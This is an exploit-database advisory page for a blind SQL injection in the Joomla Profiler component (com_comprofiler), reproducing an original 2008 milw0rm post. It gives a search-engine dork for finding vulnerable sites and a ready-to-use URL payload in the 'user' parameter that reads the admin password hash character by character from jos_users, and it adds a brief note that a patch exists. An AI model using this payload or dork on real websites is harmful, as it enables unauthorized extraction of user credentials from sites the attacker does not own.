Joomla Component Profiler Blind SQL Injection

vendor:

Profiler

by:

$hur!k'n

7.5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: Profiler

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Joomla Component Profiler Blind SQL Injection

An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable parameter 'user' in the URL. The query will be executed in the backend database and the results will be returned in the response. An example of such a query is '/index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*'

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to update their installations to the latest version.

Source

Exploit-DB raw data:

#########################################################
#							#
#     Joomla Component Profiler Blind SQL Injection	#
#							#
#########################################################


########################################

[~] Vulnerability found by: $hur!k'n
[~] Contact: alibabanala@hotmail.com

########################################

[~] ScriptName: "Joomla"
[~] ModuleName: "Profiler"
[~] Version: ? 

########################################

[~] DORK: allinurl:com_comprofiler

########################################

[~] Exploit: /index.php?option=com_comprofiler&task=userProfile&user=[SQL]
[~] Example: /index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*

########################################

# milw0rm.com [2008-04-23]